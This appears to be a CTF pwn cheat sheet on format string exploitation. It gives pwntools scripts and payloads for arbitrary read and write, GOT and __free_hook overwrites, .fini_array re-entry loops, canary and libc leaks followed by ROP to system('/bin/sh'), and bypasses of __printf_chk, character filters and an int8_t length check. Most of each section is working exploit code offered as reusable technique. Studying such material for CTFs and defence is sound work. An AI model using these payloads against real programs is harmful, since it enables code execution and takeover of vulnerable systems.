# CTF Pwn - Format String Exploitation

## Table of Contents

- [Format String Basics](#format-string-basics)
- [Argument Retargeting (Non-Positional %n Trick)](#argument-retargeting-non-positional-n-trick)
- [Blind Pwn (No Binary Provided)](#blind-pwn-no-binary-provided)
- [Format String with Filter Bypass](#format-string-with-filter-bypass)
- [Format String Canary + PIE Leak](#format-string-canary--pie-leak)
- [__free_hook Overwrite via Format String (glibc < 2.34)](#__free_hook-overwrite-via-format-string-glibc--234)
- [.rela.plt / .dynsym Patching](#relaplt--dynsym-patching)
- [Format String for Game State Manipulation (UTCTF 2026)](#format-string-for-game-state-manipulation-utctf-2026)
- [Format String Saved EBP Overwrite for .bss Pivot (PlaidCTF 2015)](#format-string-saved-ebp-overwrite-for-bss-pivot-plaidctf-2015)
- [argv[0] Overwrite for Stack Smash Info Leak (HITCON CTF 2015)](#argv0-overwrite-for-stack-smash-info-leak-hitcon-ctf-2015)
- [Format String .fini_array Loop for Multi-Stage Exploitation (Codegate 2016)](#format-string-fini_array-loop-for-multi-stage-exploitation-codegate-2016)
- [__printf_chk Bypass with Sequential %p (VolgaCTF 2017)](#__printf_chk-bypass-with-sequential-p-volgactf-2017)
- [Leak + GOT Overwrite in Single printf Call (picoCTF 2017)](#leak--got-overwrite-in-single-printf-call-picoctf-2017)
- [Objective-C %@ Format Specifier Exploitation (SHA2017)](#objective-c--format-specifier-exploitation-sha2017)
- [strlen Integer Truncation Bypass (ASIS CTF Finals 2017)](#strlen-integer-truncation-bypass-asis-ctf-finals-2017)

---

## Format String Basics

- Leak stack: `%p.%p.%p.%p.%p.%p`
- Leak specific offset: `%7$p`
- Write value: `%n` (4-byte), `%hn` (2-byte), `%hhn` (1-byte), `%lln` (8-byte)
- GOT overwrite for code execution

**Write size specifiers (x86-64):**

| Specifier | Bytes Written | Use Case |
|-----------|---------------|----------|
| `%n` | 4 | 32-bit values |
| `%hn` | 2 | Split writes |
| `%hhn` | 1 | Precise byte writes |
| `%lln` | 8 | Full 64-bit address (clears upper bytes) |

**IMPORTANT:** On x86-64, GOT entries are 8 bytes. A 4-byte `%n` write leaves the upper 4 bytes holding the remains of the old libc address. Use `%lln` to write all 8 bytes and zero the upper bits.

**Arbitrary read primitive:**

```python
from pwn import *

context.arch = 'amd64'  # flat() packs integers as 8-byte words

def arb_read(addr):
    # The format string fills the first qword of the buffer; addr sits in the next one.
    # %7$s reads the string at the address placed at offset 7.
    payload = flat({0: b'%7$s#', 8: addr})
    io.sendline(payload)  # io: an already-connected tube
    return io.recvuntil(b'#')[:-1]
```

**Arbitrary write primitive:**

```python
from pwn import fmtstr_payload

payload = fmtstr_payload(offset, {target_addr: value})
```

**Manual GOT overwrite (x86-64):**

```python
from pwn import p64

# Format: %<value>c%<offset>$lln + padding + address
# Address at offset 8 when format is 16 bytes
win = 0x4011f6
target_got = 0x404018  # e.g., printf@GOT

fmt = f'%{win}c%8$lln'.encode()  # Print 'win' chars, then store the count via offset 8
fmt = fmt.ljust(16, b'X')        # Pad to 16 bytes (2 qwords)
payload = fmt + p64(target_got)  # Address lands at offset 6 + 16/8 = 8
# Note: This prints ~4MB of spaces - be patient waiting for output
```

**Offset calculation for addresses:**

- Buffer typically starts at offset 6 (after register args)
- If the format string is padded to N bytes, addresses start at offset `6 + N/8`
- Example: 16-byte format → addresses at offset 8
- Example: 32-byte format → addresses at offset 10
- Example: 64-byte format → addresses at offset 14

**Verify offset with test payload:**

```python
# Put a known address after the N-byte format, check with %<offset>$p
test = b'%8$p___XXXXXXXXX'  # 16 bytes
payload = test + p64(0xDEADBEEF)
# Should print 0xdeadbeef if offset 8 is correct
```

**GOT target selection:**

- If `exit@GOT` doesn't work, try other GOT entries
- `printf@GOT`, `puts@GOT`, `putchar@GOT` are good alternatives
- Target functions called AFTER the format string vulnerability
- Check call order in disassembly to pick the best target

**Key insight:** Format string vulnerabilities are identified by sending `%p.%p.%p` as input -- if hex addresses appear in the output, the program passes user
input directly as the format argument to `printf`/`sprintf`. This gives both arbitrary read (`%s` with a target address) and arbitrary write (`%n` family) primitives.

## Argument Retargeting (Non-Positional %n Trick)

Use this when you cannot embed addresses (input filtering, newline issues) but can still use `%n` and a stack pointer is available as an argument.

**Key idea:** Non-positional specifiers consume arguments in order. You can overwrite a *future* argument (which is itself a pointer) before it is used, then use it as an arbitrary write target.

**Why non-positional:** Positional formats (`%22$hn`) are cached up front by glibc, so changing the underlying stack slot after parsing won't change the pointer. Non-positional `%n` avoids that cache.

**Workflow (example):**

1. Leak offsets: find a stack pointer argument you can overwrite (e.g., saved `rbp` on the stack).
2. Advance the argument index with `%c` (each `%c` consumes one argument).
3. Use `%n` to write a 4-byte value into that pointer slot (e.g., make arg22 point to `exit@GOT`).
4. Print additional chars and use `%hn` to write the low 2 bytes to the now-retargeted pointer.

**Pattern (conceptual, `<...>` are width placeholders):**

```text
%c%c%c...%c       # consume args to reach pointer slot
%<width>c%n       # overwrite pointer slot with target_addr (e.g., exit@GOT)
%<delta>c%hn      # write low 2 bytes of win to that GOT entry
```

**Compute widths:**

- After writing `target_addr` with `%n`, the printed count is `C`.
- To write low 2 bytes `W` with `%hn`, print:
  - `delta = (W - (C % 65536)) mod 65536`

**When it works well:**

- No PIE / Partial RELRO (GOT writable)
- You can afford large outputs (millions of chars)

**Stack layout discovery (find your input offset):**

```text
%1$p %2$p %3$p ... %50$p
```

- Your input appears at some offset (commonly 6-8)
- Canary: looks like `0x...00` (least significant byte is null)
- Saved RBP: stack address pattern
- Return address: code address (PIE or libc)

## Blind Pwn (No Binary Provided)

When no binary is given, use format strings to discover everything:

**1. Confirm vulnerability:**

```text
> %p-%p-%p-%p
0x563b6749100b-0x71-0xffffffff-0x7ffff9c37b80
```

**2. Discover protections by leaking stack:**

- Find canary (offset ~39, pattern `0x...00`)
- Find saved RBP (offset ~40, stack address)
- Find return address (offset ~41-43, code pointer)

**3. Identify PIE base:**

- Leak a return address pointing into main/binary
- Subtract the known offset to get the base (may need guessing)

**4. Dump GOT to identify libc:**

```python
from pwn import u64

# Read GOT entries for known functions.
# arb_read() returns raw bytes up to the first NUL, so pad to 8 bytes and unpack.
puts_addr = u64(arb_read(pie_base + got_puts_offset).ljust(8, b'\x00'))
stack_chk_addr = u64(arb_read(pie_base + got_stack_chk_offset).ljust(8, b'\x00'))
```

**5. Cross-reference libc database:**

- https://libc.blukat.me/
- https://libc.rip/
- Input multiple function addresses to identify the exact libc version

**Key insight:** Blind pwn without a binary requires systematic discovery: leak stack values to find canary/PIE/libc pointers, use arbitrary read to dump GOT entries, cross-reference leaked addresses against libc databases to identify the exact version, then compute offsets for one_gadget or system().

**6. Calculate libc base:**

```python
# From leaked __libc_start_main return or similar
libc.address = leaked_ret_addr - known_offset
```

**Common stack offsets (x86_64):**

| Offset | Typical Content |
|--------|-----------------|
| 6-8 | User input buffer |
| ~39 | Stack canary |
| ~40 | Saved RBP |
| ~41-43 | Return address |

## Format String with Filter Bypass

**Pattern (Cvexec):** `filter_string()` strips `%`, but the filter can be bypassed with `%%%p`.

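
To make the triple-percent trick concrete, here is a minimal sketch of one way such a filter could be written and why it fails. Both `naive_filter` and `live_conversions` are hypothetical stand-ins invented for illustration; the real `filter_string()` may work differently. The assumed bug is that the filter treats any `%` with a `%` neighbour as an escape, while `printf` pairs `%%` strictly left to right.

```python
import re

# Hypothetical filter: strip every '%' that has no '%' neighbour, on the
# (wrong) assumption that a '%' next to another '%' is always an escape.
_ISOLATED_PERCENT = re.compile(rb'(?<!%)%(?!%)')

def naive_filter(data: bytes) -> bytes:
    return _ISOLATED_PERCENT.sub(b'', data)

def live_conversions(fmt: bytes) -> list:
    """Conversions printf would act on, pairing '%%' left to right."""
    found, i = [], 0
    while i < len(fmt):
        if fmt[i:i + 1] != b'%':
            i += 1
        elif fmt[i + 1:i + 2] == b'%':
            i += 2                      # '%%' prints a literal percent sign
        else:
            found.append(fmt[i:i + 2])  # a real conversion such as b'%p'
            i += 2
    return found

for attempt in (b'%p', b'%%p', b'%%%p'):
    print(attempt, '->', live_conversions(naive_filter(attempt)))
```

Under this model only the third input leaves a live `%p` for `printf` to expand.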
**Filter bypass:** If the filter only checks the characters adjacent to `%`:

- `%p` → filtered
- `%%p` → properly escaped (prints literal `%p`)
- `%%%p` → third `%` survives, prints stack value

**GOT overwrite via format string (byte-by-byte with `%hhn`):**

```python
from pwn import p64

# Write last 3 bytes of debug() addr to strcmp@GOT across 3 payloads
# Pad address to a consistent stack offset (e.g., 14th position)
for byte_offset in range(3):
    target = got_strcmp + byte_offset
    byte_val = (debug_addr >> (byte_offset * 8)) & 0xff
    prev_written = 0  # each payload is its own printf call, so nothing is printed before it
    # Chars to print before %hhn; a zero byte needs a full wrap of 256
    width = (byte_val - prev_written) % 256 or 256
    payload = "%%%dc%%%d$hhn" % (width, 14)
    payload = payload.encode().ljust(48, b'X') + p64(target)
    io.sendline(payload)
```

## Format String Canary + PIE Leak

**Pattern (My Little Pwny):** Use a format string vulnerability to leak the canary and PIE base, then exploit a buffer overflow.

**Two-stage attack:**

```python
# Stage 1: Leak via format string
io.sendline(b'%39$p.%41$p')  # Canary at offset 39, return addr at 41
leak = io.recvline().strip()
canary = int(leak.split(b'.')[0], 16)
pie_base = int(leak.split(b'.')[1], 16) - known_offset

# Stage 2: Buffer overflow with known canary
win = pie_base + win_offset
payload = b'A' * buf_size + p64(canary) + p64(0) + p64(win)
io.sendline(payload)
```

## __free_hook Overwrite via Format String (glibc < 2.34)

**Pattern (Notetaker, PascalCTF 2026):** Full RELRO + No PIE + format string vulnerability. The GOT cannot be overwritten, but `__free_hook` is writable.

**Key insight:** `free(ptr)` passes `ptr` in `rdi` as first argument. If `__free_hook = system`, then `free("cat flag")` executes `system("cat flag")`.

```python
# 1. Leak libc via format string
p.sendline(b'%43$p')  # __libc_start_main return address
leaked = p.recvline().strip()
libc_base = int(leaked, 16) - LIBC_START_MAIN_RET_OFFSET

# 2. Write system() address to __free_hook
free_hook = libc_base + libc.symbols['__free_hook']
system_addr = libc_base + libc.symbols['system']
payload = fmtstr_payload(8, {free_hook: system_addr}, write_size='byte')

# 3. Trigger: send command as menu input, program calls free(input_buffer)
p.sendline(b'cat flag')  # free() → system("cat flag")
```

**When to use:** Full RELRO (no GOT overwrite) + glibc < 2.34 (hooks still exist). For glibc >= 2.34 the hooks are removed; target return addresses or `_IO_FILE` structs instead.

## .rela.plt / .dynsym Patching

**When to use:** GOT addresses contain bad bytes (e.g., 0x0a with fgets), making a direct GOT overwrite impossible. Requires `.rela.plt` and `.dynsym` in writable memory.

**Technique:** Patch the symbol index in the `.rela.plt` relocation entry so it points to a different symbol, then patch that `.dynsym` symbol's `st_value` with the `win()` address. When the original function is called, the dynamic linker reads the patched relocation and jumps to `win()`. This only works while the function is still unresolved (lazy binding), since the relocation is consulted on the first call.

```python
# Key addresses (from readelf -S)
REL_SYM_BYTE    = 0x4006ec  # .rela.plt[exit].r_info byte containing symbol index
STDOUT_STVAL_LO = 0x4004e8  # .dynsym[11].st_value low halfword
STDOUT_STVAL_HI = 0x4004ea  # .dynsym[11].st_value high halfword

# Format string writes via %hhn (8-bit) and %hn (16-bit)
# 1. Write symbol index 0x0b to r_info byte
# 2. Write win() address low halfword to st_value
# 3. Write win() address high halfword to st_value+2
```

**When GOT has bad bytes but .rela.plt/.dynsym don't:** This technique bypasses all GOT byte restrictions since you never write to the GOT directly.

**Key insight:** When GOT addresses contain bad bytes (e.g., `0x0a` with `fgets`), avoid writing to the GOT directly. Instead, patch `.rela.plt` to redirect the relocation to a different `.dynsym` entry, then overwrite that symbol's `st_value` with the target address. The dynamic linker follows the patched chain on the next call.

---

## Format String for Game State Manipulation (UTCTF 2026)

**Pattern (Small Blind):** Poker/card game where the player name is vulnerable to a format string. The stack contains pointers to game state variables (player chips, dealer chips). Write arbitrary values through them to satisfy the win condition.

**Key insight:** `%n` writes the number of characters printed so far. Use `%Xc` to control that count, then `%N$n` to write through the Nth stack argument (which points to a game variable).

**Exploitation:**

```python
from pwn import *

p = remote('challenge.utctf.live', 7255)
p.recvuntil(b'Enter your name: ')

# %1000c prints 1000 chars (padding), then %7$n writes 1000 via stack pos 7
# Stack position 7 = pointer to player_chips variable
p.sendline(b'%1000c%7$n')

# Player now has 1000 chips → triggers win condition
# Collect flag from game output
```

**Discovery workflow:**

1. **Confirm format string:** Send `%p.%p.%p.%p` as name, check for hex leaks
2. **Map stack positions:** Try `%6$n`, `%7$n`, `%8$n` with different `%Xc` values
3. **Identify which variable changed:** Compare game output (chips, score, health) before/after
4. **Determine win condition:** May be `player_chips >= threshold` or `player > dealer`
5. **Craft winning payload:** Set player chips high (`%9999c%7$n`) or dealer chips to 0 (`%6$n`)

**Common game state patterns on stack:**

| Position | Typical Variable |
|----------|-----------------|
| 6 | Pointer to dealer/opponent state |
| 7 | Pointer to player state |
| 8-10 | Score, health, inventory |

**When `%n` writes to adjacent variables:** If player and dealer chips are adjacent in memory (4 bytes apart), positions N and N+1 may point to them. Write 0 to the dealer (`%N$n` with 0 chars printed) and a high value to the player (`%9999c%(N+1)$n`).

**Key insight:** Format string vulnerabilities in game binaries are simpler than typical pwn: you don't need a shell, just manipulate game state to trigger the win condition. Map stack positions to game variables, then write the winning values.

---

## Format String Saved EBP Overwrite for .bss Pivot (PlaidCTF 2015)

**Pattern (EBP):** The format string buffer is in `.bss` (fixed address) rather than on the stack. A classic `%n` arbitrary write requires attacker-supplied addresses on the stack, which is impossible with `.bss` buffers.
Instead, overwrite the saved EBP to redirect the function epilogue (`leave; ret`) to the `.bss` buffer.

**How `leave; ret` works:**

```asm
leave:  mov esp, ebp    ; esp = saved_ebp
        pop ebp         ; ebp = [saved_ebp]
ret:    pop eip         ; eip = [saved_ebp + 4]
```

**Exploit layout in `.bss` buffer at address `0x0804A080`:**

```text
[addr_of_buf-4][padding_to_write_value][%n][shellcode...]
```

Write `buf_addr - 4` (e.g., `0x0804A07C`) into the saved EBP via `%n`. The vulnerable function's own epilogue pops that value into EBP; the next `leave` (in its caller) then sets `esp = 0x0804A07C`, and `ret` pops the dword stored at `0x0804A080` into EIP.

**Key insight:** When the format string buffer is at a fixed `.bss` address (not stack), overwrite saved EBP to pivot the stack into `.bss`. The `leave; ret` epilogue uses EBP to set ESP, so controlling EBP controls where `ret` reads EIP from. Place shellcode address (or ROP chain) at `buf_addr` and shellcode at `buf_addr + offset`.

---

## argv[0] Overwrite for Stack Smash Info Leak (HITCON CTF 2015)

**Pattern (nanana):** When a stack canary is corrupted, `__stack_chk_fail` in older glibc versions prints `*** stack smashing detected ***: <argv[0]> terminated`. Since `argv[0]` is a pointer stored on the stack, overwriting it with the address of a secret (e.g., global password buffer) leaks the secret through the crash message.

**Attack steps:**

1. Overflow past the canary (deliberately corrupting it)
2. Continue overwriting the stack to reach `argv[0]` (pointer to program name)
3. Replace `argv[0]` with the address of the target data (e.g., `0x601090` = `g_password`)
4. The stack smash handler prints: `*** stack smashing detected ***: <contents of g_password> terminated`

```python
from pwn import p64

# Overflow to overwrite argv[0] with address of global password
# canary_offset, argv0_offset, password_addr come from static/dynamic analysis
payload = b"A" * canary_offset                   # reach canary (deliberately corrupt it)
payload += b"B" * (argv0_offset - canary_offset) # padding to argv[0]
payload += p64(password_addr)                    # overwrite argv[0] -> password string
```

**Key insight:** A "failed" exploit that triggers `__stack_chk_fail` becomes an information leak when `argv[0]` is overwritten. This is useful as a first stage: leak a secret (password, canary, address), then use it in a second connection for the real exploit. Works because `argv` is stored on the stack above local variables.

---

## Format String .fini_array Loop for Multi-Stage Exploitation (Codegate 2016)

**Pattern:** When no GOT function is called after `printf()`, chain multiple format string writes across re-executions by overwriting `.fini_array` with `main()`:

1. **Stage 1:** Overwrite `.fini_array[0]` with `main()`, leak libc + stack pointers
2. **Stage 2:** Overwrite `printf@GOT` with `system()`, overwrite `__stack_chk_fail@GOT` with `main()`
3. **Stage 3:** Deliberately corrupt the stack canary so `__stack_chk_fail` re-enters `main()`. Now `printf(input)` is `system(input)` -- send `/bin/sh`

```python
# Stage 1: loop back via .fini_array, leak addresses
payload = fmtstr_payload(offset, {fini_array: main_addr})

# Stage 2: redirect printf to system, set up canary fail re-entry
payload = fmtstr_payload(offset, {printf_got: system, stack_chk_got: main_addr})

# Stage 3: corrupt canary -> __stack_chk_fail -> main -> system(input)
```

**Key insight:** `.fini_array` entries are called after `main()` returns, during exit processing. Overwriting an entry with `main()` creates an execution loop for multi-stage format string attacks. Deliberately corrupting the canary triggers `__stack_chk_fail` as a controlled re-entry vector once that GOT entry has been redirected.

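
Stage 2 has to land two full pointers with a single `printf`. `fmtstr_payload` handles that, but the arithmetic underneath can be sketched as follows. This is an illustrative planner, not pwntools' actual algorithm; `plan_hn_writes` and the addresses in the usage line are hypothetical. It splits each 64-bit value into 16-bit chunks and emits them in ascending order so the running character count only ever needs to grow.

```python
def plan_hn_writes(writes, already_printed=0):
    """Return [(address, pad)] for 2-byte %hn writes, in emission order.

    writes maps a target address to the 64-bit value to store there.
    pad is how many extra characters to print before that %hn; a pad of 0
    means the %hn is emitted with no %c in front of it.
    """
    chunks = []
    for addr, value in writes.items():
        for i in range(4):
            chunks.append((addr + 2 * i, (value >> (16 * i)) & 0xFFFF))
    chunks.sort(key=lambda chunk: chunk[1])  # smallest chunk value first

    plan, count = [], already_printed
    for addr, want in chunks:
        pad = (want - count) % 0x10000       # %hn stores the count modulo 2**16
        plan.append((addr, pad))
        count += pad
    return plan

# Hypothetical GOT slot and libc address, for illustration only
for addr, pad in plan_hn_writes({0x601020: 0x00007f1234567890}):
    print(hex(addr), pad)
```

Each `(address, pad)` pair then becomes a `%<pad>c%<k>$hn` fragment, with the addresses appended after the format text at argument positions `k`.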
**References:** Codegate 2016

---

## __printf_chk Bypass with Sequential %p (VolgaCTF 2017)

**Pattern:** `__printf_chk()` blocks `%n` writes (when the format string lives in writable memory) and direct parameter access that skips arguments (`%123$p`). Bypass by chaining sequential `%p` specifiers to reach the desired stack offset.

```python
from pwn import *

# __printf_chk restrictions:
# - No %n/%hn/%hhn writes
# - No direct access: %123$p fails
# - Sequential access still works: %p%p%p...

# Leak canary at stack offset 267:
payload = "%p." * 267 + "%p"  # sequential %p past offset 267
io.sendline(payload.encode())
response = io.recvline().decode()
leaks = response.split(".")
canary = int(leaks[266], 16)  # 267th value (list index is 0-based)

# Leak libc return address at offset 269:
payload = "%p." * 269 + "%p"
io.sendline(payload.encode())
response = io.recvline().decode()
leaks = response.split(".")
libc_ret = int(leaks[268], 16)
libc_base = libc_ret - known_offset

# Then use stack overflow for ROP since format string write is blocked
payload = b"A" * buf_size
payload += p64(canary)
payload += p64(0)  # saved rbp
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
io.sendline(payload)
```

**Key insight:** While `__printf_chk` prevents `%n` and direct parameter access (`%N$`), it still allows sequential format specifiers. Chaining hundreds of `%p` reaches any stack offset, enabling leaks (canary, libc, PIE) even without write capability. Combine with a separate overflow vulnerability for the write stage.

**When to recognize:** Binary uses `__printf_chk` or `__fprintf_chk` (visible in disassembly; emitted when compiled with `_FORTIFY_SOURCE`). Direct `%N$p` fails but sequential `%p%p%p...` still works. Output may be very large -- parse carefully with delimiters.

**References:** VolgaCTF 2017

---

## Leak + GOT Overwrite in Single printf Call (picoCTF 2017)

**Pattern:** When a format string vulnerability is followed immediately by `exit(0)`, combine the address leak and the GOT overwrite in a single printf invocation.

```python
from pwn import *

# Must leak libc AND redirect exit() in one printf call
# Layout: padding + filler + %leak$p + %Nc + %write$hn + padding + got_addr
exit_got = elf.got['exit']
main_addr = elf.sym['main']
target_low16 = main_addr & 0xFFFF

payload = b'e_______'   # 8 bytes padding
payload += b'A' * 8     # 8 filler bytes; must be NUL-free because printf stops at the first NUL
payload += b' %25$p'    # leak libc address at offset 25

# Characters printed so far = literal text + the expanded pointer.
# LEAK_WIDTH is an assumption: %p prints a 0x7f... address as 14 characters.
LEAK_WIDTH = 14
bytes_written = len(payload) - len(b'%25$p') + LEAK_WIDTH
padding_needed = (target_low16 - bytes_written) % 0x10000
payload += f'%{padding_needed}c%19$hn'.encode()   # write low 2 bytes via offset 19
payload += b'A' * ((8 - (len(payload) % 8)) % 8)  # align to 8 bytes
payload += p64(exit_got)                          # address for %19$hn write

# Result: leaks libc via %25$p AND overwrites exit@GOT via %19$hn
# exit() jumps back to main for second-stage exploitation
io.sendline(payload)

# Parse leaked libc address from output
io.recvuntil(b' 0x')
libc_leak = int(io.recv(12), 16)
libc_base = libc_leak - known_offset

# Second pass: now with libc known, overwrite for shell
# ...
```

**Key insight:** A single `printf` can perform both reads (`%p`) and writes (`%hn`) in the same call. When `exit()` immediately follows the vulnerability, overwrite `exit@GOT` with `main`'s address in the same call that leaks libc, creating a re-entry point for full exploitation. The key is careful offset calculation so the leak specifier and write specifier reference the correct stack positions, and so the write count includes the characters produced by the leak.

**When to recognize:** Format string vulnerability with only one shot before `exit()` or another terminating function. The single-call technique establishes the re-entry loop and the leak at once, so no prior loop is needed.

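
Because the leak and the write share one output stream, the leaked pointer arrives surrounded by filler text and thousands of padding characters. A tolerant parser can be sketched like this; `extract_leak` is a hypothetical helper, and the sample output in the usage line is made up to resemble what such a payload might print.

```python
import re

# A %p value: "0x" followed by 6 to 16 lowercase hex digits
_POINTER = re.compile(rb'0x([0-9a-f]{6,16})')

def extract_leak(output: bytes) -> int:
    """Return the first %p-style pointer found in raw printf output."""
    match = _POINTER.search(output)
    if match is None:
        raise ValueError('no pointer found in output')
    return int(match.group(1), 16)

# Made-up output: literal prefix, leaked pointer, %c padding, trailing GOT bytes
sample = b'e_______AAAAAAAA 0x7f3a1c2b4d90' + b' ' * 5000 + b'\x18\x10\x60'
print(hex(extract_leak(sample)))
```

With pwntools this would typically be fed the bytes collected from the tube, for example everything received before the next prompt. It assumes no earlier literal text in the output happens to look like a pointer.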
**References:** picoCTF 2017

---

## Objective-C %@ Format Specifier Exploitation (SHA2017)

**Pattern:** Objective-C's `NSLog` and related functions support the `%@` format specifier, which calls `objc_msg_lookup(rdi, ...)`, treating the corresponding stack value as an Objective-C object pointer. Control the stack value consumed by `%N$@` to control `rdi`. Analysis of `objc_msg_lookup` reveals a `call rax` gadget reachable under crafted conditions, enabling one-shot execution.

**Mechanism:**

```text
NSLog(@"Hello %@", user_input)
→ %@ consumes next argument from stack
→ argument is treated as Objective-C object pointer (rdi)
→ objc_msg_lookup(rdi, "description") is called
→ if [rdi+8] == 0 (ISA check fails), execution reaches: call rax
→ rax is under attacker control via the crafted "object"
```

**Exploitation:**

```python
# Craft a fake Objective-C object on the stack via format string write
# Object layout: [isa_ptr][method_list_ptr][...]
# Set isa_ptr = 0 to reach the call rax path in objc_msg_lookup
# Set rax = one_gadget or system() via prior %n writes

# Locate %N$@ position: stack offset where fake object pointer lands
# Use %n to write fake object address at the right stack slot
# Then trigger %@ to call objc_msg_lookup → call rax → shell
# <...> are placeholders for values found during analysis
payload = b'%<fake_obj_addr>c%<slot>$lln'  # write fake obj addr
payload += b'%<N>$@'                       # trigger call rax
```

**Key insight:** Objective-C format strings include `%@`, which invokes `objc_msg_lookup` on a stack pointer. That turns a read-only format string bug into a controlled-call primitive via the objc runtime. The `call rax` gadget inside `objc_msg_lookup` is reachable when the ISA pointer check fails, making a crafted "null ISA" object sufficient to redirect execution.

**References:** SHA2017

---

## strlen Integer Truncation Bypass (ASIS CTF Finals 2017)

**Pattern:** Binary filters format string input by checking that each character up to `strlen(input)+1` is lowercase.
However, the `strlen()` result is cast to `int8_t`, so the length is reduced modulo 256 and reinterpreted as signed: at input length 255, `(int8_t)(255 + 1)` overflows to 0, collapsing the sanitization window to an empty range. For longer inputs only a short prefix is checked, so format specifiers like `%n` placed beyond byte 255 bypass the filter entirely.

**Vulnerable code pattern:**

```c
#include <ctype.h>
#include <stdint.h>
#include <string.h>

void reject(void);  /* placeholder for the program's error path */

void filter(char *input) {
    int8_t len = (int8_t)strlen(input);  // 255 → -1, 256 → 0, 262 → 6
    for (int8_t i = 0; i <= len; i++) {  // at len == -1: 0 <= -1 is false, loop never runs
        if (!islower(input[i])) reject();
    }
}
```

**Exploitation:**

```python
from pwn import p64

# Pad with 255 lowercase bytes, then place the %n-based payload starting at byte 255.
# The total length exceeds 255, so the truncated len is small and the loop only
# inspects the first few filler bytes, all of which are lowercase.
filler = b'a' * 255
exploit_suffix = b'%7$n' + p64(target_addr)  # unchecked bytes
payload = filler + exploit_suffix
```

**Key insight:** Casting `strlen()` to `int8_t` wraps the length modulo 256 (and makes it negative for lengths 128 to 255), shrinking the sanitization window to nothing or to a short prefix. Any payload content placed at or beyond byte 255 escapes the filter. Always check for integer truncation when a length field is stored in a signed or short type.

**References:** ASIS CTF Finals 2017
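
The wraparound is easy to check offline. The sketch below models the `for (i = 0; i <= len; i++)` loop from the code pattern above using `ctypes.c_int8`, which applies the same modulo-256 signed conversion as the C cast on common platforms. `checked_prefix_len` is a hypothetical helper, and the 262-byte case assumes a target address with three non-NUL bytes.

```python
import ctypes

def checked_prefix_len(input_len: int) -> int:
    """How many leading bytes the filter loop inspects for a given strlen().

    Models `int8_t len = (int8_t)strlen(input); for (i = 0; i <= len; i++)`.
    A truncated length of exactly 127 is not modelled: the int8_t loop
    counter itself would overflow in the C code.
    """
    len8 = ctypes.c_int8(input_len).value  # same wrap as the (int8_t) cast
    return len8 + 1 if len8 >= 0 else 0

for n in (10, 200, 255, 256, 262):
    print(n, '->', checked_prefix_len(n))
```

For a 262-byte input the loop inspects only 7 bytes, all of them filler, so the `%7$n` at byte 255 is never examined.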